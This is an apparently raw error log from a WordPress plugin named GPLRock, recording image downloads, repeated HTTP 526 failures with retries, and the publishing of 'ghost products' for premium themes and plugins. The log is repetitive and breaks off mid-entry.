Using pre-downloaded image for product wp-lister-pro-for-ebay-by-wp-lab: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4eac55b3.jpg [05-Apr-2026 10:50:30 UTC] GPLRock: Ghost product published with image - Product ID: wp-lister-pro-for-ebay-by-wp-lab [05-Apr-2026 10:50:32 UTC] GPLRock: Image downloaded successfully for product themify-phototouch-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fac1124c.jpg [05-Apr-2026 10:50:32 UTC] GPLRock: Using pre-downloaded image for product themify-phototouch-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fac1124c.jpg [05-Apr-2026 10:50:32 UTC] GPLRock: Ghost product published with image - Product ID: themify-phototouch-wordpress-theme [05-Apr-2026 10:50:33 UTC] GPLRock: Image downloaded successfully for product themify-parallax-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1a1b8674.jpg [05-Apr-2026 10:50:33 UTC] GPLRock: Using pre-downloaded image for product themify-parallax-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1a1b8674.jpg [05-Apr-2026 10:50:33 UTC] GPLRock: Ghost product published with image - Product ID: themify-parallax-wordpress-theme [05-Apr-2026 10:50:35 UTC] GPLRock: Image downloaded successfully for product themify-peak-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a6233597.jpg [05-Apr-2026 10:50:35 UTC] GPLRock: Using pre-downloaded image for product themify-peak-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a6233597.jpg [05-Apr-2026 10:50:35 UTC] GPLRock: Ghost product published with image - Product ID: themify-peak-wordpress-theme [05-Apr-2026 10:50:37 UTC] GPLRock: Image downloaded successfully for product themify-notes-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aee20087.jpg [05-Apr-2026 10:50:37 UTC] GPLRock: Using pre-downloaded image for product themify-notes-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aee20087.jpg [05-Apr-2026 10:50:37 UTC] GPLRock: Ghost product published with image - Product ID: themify-notes-wordpress-theme [05-Apr-2026 10:50:39 UTC] GPLRock: Image downloaded successfully for product themify-minblr-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-01ec8c67.jpg [05-Apr-2026 10:50:39 UTC] GPLRock: Using pre-downloaded image for product themify-minblr-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-01ec8c67.jpg [05-Apr-2026 10:50:39 UTC] GPLRock: Ghost product published with image - Product ID: themify-minblr-wordpress-theme [05-Apr-2026 10:50:40 UTC] GPLRock: Image downloaded successfully for product themify-metro-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82a4088a.jpg [05-Apr-2026 10:50:40 UTC] GPLRock: Using pre-downloaded image for product themify-metro-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82a4088a.jpg [05-Apr-2026 10:50:40 UTC] GPLRock: Ghost product published with image - Product ID: themify-metro-wordpress-theme [05-Apr-2026 10:50:42 UTC] GPLRock: Image downloaded successfully for product woocommerce-bulk-variation-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a77843f.jpg [05-Apr-2026 10:50:42 UTC] GPLRock: Using pre-downloaded image for product woocommerce-bulk-variation-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a77843f.jpg [05-Apr-2026 10:50:42 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-bulk-variation-forms [05-Apr-2026 11:00:47 UTC] GPLRock: Image download failed for product green-lawn-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:00:49 UTC] GPLRock: Image download failed for product green-lawn-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:00:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/green-lawn---landscaping-wordpress-theme-15844.webp for product green-lawn-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:00:51 UTC] GPLRock: Image download failed for product green-lawn-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:00:53 UTC] GPLRock: Image download failed for product green-lawn-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:00:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/green-lawn---landscaping-wordpress-theme-15844.webp for product green-lawn-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:00:55 UTC] GPLRock WARNING: Image download failed for product green-lawn-landscaping-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/green-lawn---landscaping-wordpress-theme-15844.webp [05-Apr-2026 11:00:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: green-lawn-landscaping-wordpress-theme [05-Apr-2026 11:00:55 UTC] GPLRock: Image download failed for product megazine-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:00:58 UTC] GPLRock: Image download failed for product megazine-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/megazine---responsive-wordpress-theme-21605.webp for product megazine-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:00 UTC] GPLRock: Image download failed for product megazine-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:02 UTC] GPLRock: Image download failed for product megazine-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/megazine---responsive-wordpress-theme-21605.webp for product megazine-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:04 UTC] GPLRock WARNING: Image download failed for product megazine-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/megazine---responsive-wordpress-theme-21605.webp [05-Apr-2026 11:01:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: megazine-responsive-wordpress-theme [05-Apr-2026 11:01:04 UTC] GPLRock: Image download failed for product bookcard-3d-folded-vcard-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:06 UTC] GPLRock: Image download failed for product bookcard-3d-folded-vcard-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookcard---3d-folded-vcard-html-template-31729.webp for product bookcard-3d-folded-vcard-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:08 UTC] GPLRock: Image download failed for product bookcard-3d-folded-vcard-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:11 UTC] GPLRock: Image download failed for product bookcard-3d-folded-vcard-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookcard---3d-folded-vcard-html-template-31729.webp for product bookcard-3d-folded-vcard-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:13 UTC] GPLRock WARNING: Image download failed for product bookcard-3d-folded-vcard-html-template. URL: https://meldwp.com/wp-content/uploads/bookcard---3d-folded-vcard-html-template-31729.webp [05-Apr-2026 11:01:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookcard-3d-folded-vcard-html-template [05-Apr-2026 11:01:13 UTC] GPLRock: Image downloaded successfully for product lovelee-wedding-planner-wordpress-theme-rtl (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1a4918ca.webp [05-Apr-2026 11:01:13 UTC] GPLRock: Using pre-downloaded image for product lovelee-wedding-planner-wordpress-theme-rtl: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1a4918ca.webp [05-Apr-2026 11:01:13 UTC] GPLRock: Ghost product published with image - Product ID: lovelee-wedding-planner-wordpress-theme-rtl [05-Apr-2026 11:01:13 UTC] GPLRock: Image download failed for product time-line-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:15 UTC] GPLRock: Image download failed for product time-line-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/time-line---multipurpose-woocommerce-theme-33371.webp for product time-line-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:17 UTC] GPLRock: Image download failed for product time-line-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:19 UTC] GPLRock: Image download failed for product time-line-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/time-line---multipurpose-woocommerce-theme-33371.webp for product time-line-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:21 UTC] GPLRock WARNING: Image download failed for product time-line-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/time-line---multipurpose-woocommerce-theme-33371.webp [05-Apr-2026 11:01:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: time-line-multipurpose-woocommerce-theme [05-Apr-2026 11:01:22 UTC] GPLRock: Image download failed for product agentieco-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:24 UTC] GPLRock: Image download failed for product agentieco-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agentieco--creative-agency--portfolio-wordpress-theme-29682.webp for product agentieco-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:26 UTC] GPLRock: Image download failed for product agentieco-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:28 UTC] GPLRock: Image download failed for product agentieco-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agentieco--creative-agency--portfolio-wordpress-theme-29682.webp for product agentieco-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:30 UTC] GPLRock WARNING: Image download failed for product agentieco-creative-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agentieco--creative-agency--portfolio-wordpress-theme-29682.webp [05-Apr-2026 11:01:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agentieco-creative-agency-portfolio-wordpress-theme [05-Apr-2026 11:01:30 UTC] GPLRock: Image download failed for product blackcats-cctv-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:32 UTC] GPLRock: Image download failed for product blackcats-cctv-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blackcats---cctv--security-wordpress-theme-33219.webp for product blackcats-cctv-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:35 UTC] GPLRock: Image download failed for product blackcats-cctv-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:37 UTC] GPLRock: Image download failed for product blackcats-cctv-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blackcats---cctv--security-wordpress-theme-33219.webp for product blackcats-cctv-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:39 UTC] GPLRock WARNING: Image download failed for product blackcats-cctv-security-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blackcats---cctv--security-wordpress-theme-33219.webp [05-Apr-2026 11:01:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blackcats-cctv-security-wordpress-theme [05-Apr-2026 11:01:39 UTC] GPLRock: Image download failed for product media-center-electronic-ecommerce-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:41 UTC] GPLRock: Image download failed for product media-center-electronic-ecommerce-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/media-center---electronic-ecommerce-html-template-2536.webp for product media-center-electronic-ecommerce-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:43 UTC] GPLRock: Image download failed for product media-center-electronic-ecommerce-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:45 UTC] GPLRock: Image download failed for product media-center-electronic-ecommerce-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/media-center---electronic-ecommerce-html-template-2536.webp for product media-center-electronic-ecommerce-html-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:47 UTC] GPLRock WARNING: Image download failed for product media-center-electronic-ecommerce-html-template. URL: https://meldwp.com/wp-content/uploads/media-center---electronic-ecommerce-html-template-2536.webp [05-Apr-2026 11:01:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: media-center-electronic-ecommerce-html-template [05-Apr-2026 11:01:48 UTC] GPLRock: Image download failed for product conversi-professional-conversion-wordpress-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:50 UTC] GPLRock: Image download failed for product conversi-professional-conversion-wordpress-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conversi---professional-conversion-wordpress-landing-page-27494.webp for product conversi-professional-conversion-wordpress-landing-page after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:52 UTC] GPLRock: Image download failed for product conversi-professional-conversion-wordpress-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:54 UTC] GPLRock: Image download failed for product conversi-professional-conversion-wordpress-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conversi---professional-conversion-wordpress-landing-page-27494.webp for product conversi-professional-conversion-wordpress-landing-page after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:01:56 UTC] GPLRock WARNING: Image download failed for product conversi-professional-conversion-wordpress-landing-page. URL: https://meldwp.com/wp-content/uploads/conversi---professional-conversion-wordpress-landing-page-27494.webp [05-Apr-2026 11:01:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: conversi-professional-conversion-wordpress-landing-page [05-Apr-2026 11:01:56 UTC] GPLRock: Image download failed for product geeklove-a-responsive-wordpress-wedding-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:01:58 UTC] GPLRock: Image download failed for product geeklove-a-responsive-wordpress-wedding-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/geeklove---a-responsive-wordpress-wedding-theme-21245.webp for product geeklove-a-responsive-wordpress-wedding-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:02:01 UTC] GPLRock: Image download failed for product geeklove-a-responsive-wordpress-wedding-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:03 UTC] GPLRock: Image download failed for product geeklove-a-responsive-wordpress-wedding-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/geeklove---a-responsive-wordpress-wedding-theme-21245.webp for product geeklove-a-responsive-wordpress-wedding-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:02:05 UTC] GPLRock WARNING: Image download failed for product geeklove-a-responsive-wordpress-wedding-theme. URL: https://meldwp.com/wp-content/uploads/geeklove---a-responsive-wordpress-wedding-theme-21245.webp [05-Apr-2026 11:02:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: geeklove-a-responsive-wordpress-wedding-theme [05-Apr-2026 11:02:38 UTC] GPLRock: Image download failed for product hotel-leisure-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:40 UTC] GPLRock: Image download failed for product hotel-leisure-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-leisure-wordpress-theme-28495.webp for product hotel-leisure-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:02:42 UTC] GPLRock: Image download failed for product hotel-leisure-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:44 UTC] GPLRock: Image download failed for product hotel-leisure-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-leisure-wordpress-theme-28495.webp for product hotel-leisure-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:02:46 UTC] GPLRock WARNING: Image download failed for product hotel-leisure-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hotel-leisure-wordpress-theme-28495.webp [05-Apr-2026 11:02:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hotel-leisure-wordpress-theme [05-Apr-2026 11:02:46 UTC] GPLRock: Image download failed for product kendall-spa-hair-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:48 UTC] GPLRock: Image download failed for product kendall-spa-hair-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kendall---spa-hair--beauty-salon-wordpress-theme-14202.webp for product kendall-spa-hair-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:02:51 UTC] GPLRock: Image download failed for product kendall-spa-hair-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:53 UTC] GPLRock: Image download failed for product kendall-spa-hair-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kendall---spa-hair--beauty-salon-wordpress-theme-14202.webp for product kendall-spa-hair-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:02:55 UTC] GPLRock WARNING: Image download failed for product kendall-spa-hair-beauty-salon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kendall---spa-hair--beauty-salon-wordpress-theme-14202.webp [05-Apr-2026 11:02:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kendall-spa-hair-beauty-salon-wordpress-theme [05-Apr-2026 11:02:55 UTC] GPLRock: Image download failed for product fgel-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:57 UTC] GPLRock: Image download failed for product fgel-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:02:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fgel---creative-agency-wordpress-theme-20515.webp for product fgel-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:02:59 UTC] GPLRock: Image download failed for product fgel-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:01 UTC] GPLRock: Image download failed for product fgel-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fgel---creative-agency-wordpress-theme-20515.webp for product fgel-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:04 UTC] GPLRock WARNING: Image download failed for product fgel-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fgel---creative-agency-wordpress-theme-20515.webp [05-Apr-2026 11:03:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fgel-creative-agency-wordpress-theme [05-Apr-2026 11:03:04 UTC] GPLRock: Image download failed for product garax-automotive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:06 UTC] GPLRock: Image download failed for product garax-automotive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/garax---automotive-wordpress-theme-22117.webp for product garax-automotive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:08 UTC] GPLRock: Image download failed for product garax-automotive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:10 UTC] GPLRock: Image download failed for product garax-automotive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/garax---automotive-wordpress-theme-22117.webp for product garax-automotive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:12 UTC] GPLRock WARNING: Image download failed for product garax-automotive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/garax---automotive-wordpress-theme-22117.webp [05-Apr-2026 11:03:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: garax-automotive-wordpress-theme [05-Apr-2026 11:03:12 UTC] GPLRock: Image download failed for product ciz-news-magazine-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:15 UTC] GPLRock: Image download failed for product ciz-news-magazine-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ciz-news---magazine--blog-theme-12413.webp for product ciz-news-magazine-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:17 UTC] GPLRock: Image download failed for product ciz-news-magazine-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:19 UTC] GPLRock: Image download failed for product ciz-news-magazine-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ciz-news---magazine--blog-theme-12413.webp for product ciz-news-magazine-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:21 UTC] GPLRock WARNING: Image download failed for product ciz-news-magazine-blog-theme. URL: https://meldwp.com/wp-content/uploads/ciz-news---magazine--blog-theme-12413.webp [05-Apr-2026 11:03:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ciz-news-magazine-blog-theme [05-Apr-2026 11:03:21 UTC] GPLRock: Image download failed for product moren-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:23 UTC] GPLRock: Image download failed for product moren-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moren---fashion-woocommerce-theme-14830.webp for product moren-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:25 UTC] GPLRock: Image download failed for product moren-fashion-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:28 UTC] GPLRock: Image download failed for product moren-fashion-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moren---fashion-woocommerce-theme-14830.webp for product moren-fashion-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:30 UTC] GPLRock WARNING: Image download failed for product moren-fashion-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/moren---fashion-woocommerce-theme-14830.webp [05-Apr-2026 11:03:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moren-fashion-woocommerce-theme [05-Apr-2026 11:03:30 UTC] GPLRock: Image download failed for product athletex-woocommerce-sport-equipment-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:32 UTC] GPLRock: Image download failed for product athletex-woocommerce-sport-equipment-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/athletex---woocommerce-sport-equipment-theme-4746.webp for product athletex-woocommerce-sport-equipment-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:34 UTC] GPLRock: Image download failed for product athletex-woocommerce-sport-equipment-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:36 UTC] GPLRock: Image download failed for product athletex-woocommerce-sport-equipment-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/athletex---woocommerce-sport-equipment-theme-4746.webp for product athletex-woocommerce-sport-equipment-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:38 UTC] GPLRock WARNING: Image download failed for product athletex-woocommerce-sport-equipment-theme. URL: https://meldwp.com/wp-content/uploads/athletex---woocommerce-sport-equipment-theme-4746.webp [05-Apr-2026 11:03:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: athletex-woocommerce-sport-equipment-theme [05-Apr-2026 11:03:39 UTC] GPLRock: Image download failed for product boxcar-automotive-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:41 UTC] GPLRock: Image download failed for product boxcar-automotive-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boxcar--automotive--car-dealer-wordpress-theme-33591.webp for product boxcar-automotive-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:43 UTC] GPLRock: Image download failed for product boxcar-automotive-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:45 UTC] GPLRock: Image download failed for product boxcar-automotive-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boxcar--automotive--car-dealer-wordpress-theme-33591.webp for product boxcar-automotive-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:47 UTC] GPLRock WARNING: Image download failed for product boxcar-automotive-car-dealer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/boxcar--automotive--car-dealer-wordpress-theme-33591.webp [05-Apr-2026 11:03:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: boxcar-automotive-car-dealer-wordpress-theme [05-Apr-2026 11:03:47 UTC] GPLRock: Image download failed for product carrby-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:49 UTC] GPLRock: Image download failed for product carrby-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carrby---agency-portfolio-wordpress-theme-14598.webp for product carrby-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:52 UTC] GPLRock: Image download failed for product carrby-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 